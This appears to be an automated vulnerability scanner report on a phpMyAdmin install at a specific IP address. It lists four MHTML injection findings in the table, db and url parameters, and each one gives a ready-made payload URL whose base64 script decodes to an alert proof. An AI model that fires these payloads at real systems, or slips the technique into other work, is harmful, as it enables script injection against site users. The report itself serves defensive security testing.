
URL | http://202.201.39.48/phpmyadmin/index.php?lang=zh_CN&table=atestu&token=b75bba5fa7203396feddaf1661b8a65c&db=atestu |
---|---|
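Request method | GET |
Affected parameter | table |
Detection criteria |
1. Change the value of the specified parameter to a special string that triggers the MHTML vulnerability and send the request; 2. If the browser is able to execute the injected code, the vulnerability is considered present. |
Detection details |
1. Constructed URL: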
http://202.201.39.48/phpmyadmin/index.php?lang=zh_CN&token=b75bba5fa7203396feddaf1661b8a65c&db=atestu&table=atestu----%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary=_webscan_atestu%250D%250A%250D%250A--_webscan_atestu%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%250D%250A--_webscan_atestu--%250D%250A%250D%250A!cookie
;
2. Set the parameter table to ----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie ; 3. Match the following in the response headers and response body: ----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie . |
URL | http://202.201.39.48/phpmyadmin/index.php?lang=zh_CN&table=atestu&token=b75bba5fa7203396feddaf1661b8a65c&db=atestu |
---|---|
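Request method | GET |
Affected parameter | db |
Detection criteria |
1. Change the value of the specified parameter to a special string that triggers the MHTML vulnerability and send the request; 2. If the browser is able to execute the injected code, the vulnerability is considered present. |
Detection details |
1. Constructed URL: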
http://202.201.39.48/phpmyadmin/index.php?lang=zh_CN&table=atestu&token=b75bba5fa7203396feddaf1661b8a65c&db=atestu----%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary=_webscan_atestu%250D%250A%250D%250A--_webscan_atestu%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%250D%250A--_webscan_atestu--%250D%250A%250D%250A!cookie
;
2. Set the parameter db to ----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie ; 3. Match the following in the response headers and response body: ----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie . |
URL | http://202.201.39.48/phpmyadmin/url.php?url=https://www.phpmyadmin.net/&lang=zh_CN&token=5137e026c7ba9f6adc23fe631d612ace |
---|---|
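Request method | GET |
Affected parameter | url |
Detection criteria |
1. Change the value of the specified parameter to a special string that triggers the MHTML vulnerability and send the request; 2. If the browser is able to execute the injected code, the vulnerability is considered present. |
Detection details |
1. Constructed URL: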
http://202.201.39.48/phpmyadmin/url.php?lang=zh_CN&token=5137e026c7ba9f6adc23fe631d612ace&url=https://www.phpmyadmin.net/----%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary=_webscan_atestu%250D%250A%250D%250A--_webscan_atestu%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%250D%250A--_webscan_atestu--%250D%250A%250D%250A!cookie
;
2. Set the parameter url to ----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie ; 3. Match the following in the response headers and response body: ----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie . |
URL | http://202.201.39.48/phpmyadmin/url.php?url=https://www.phpmyadmin.net/&token=7f6f76c93661b81b29cd7457ecae1b45 |
---|---|
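Request method | GET |
Affected parameter | url |
Detection criteria |
1. Change the value of the specified parameter to a special string that triggers the MHTML vulnerability and send the request; 2. If the browser is able to execute the injected code, the vulnerability is considered present. |
Detection details |
1. Constructed URL: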
http://202.201.39.48/phpmyadmin/url.php?token=7f6f76c93661b81b29cd7457ecae1b45&url=https://www.phpmyadmin.net/----%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary=_webscan_atestu%250D%250A%250D%250A--_webscan_atestu%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%250D%250A--_webscan_atestu--%250D%250A%250D%250A!cookie
;
2. Set the parameter url to ----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie ; 3. Match the following in the response headers and response body: ----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie . |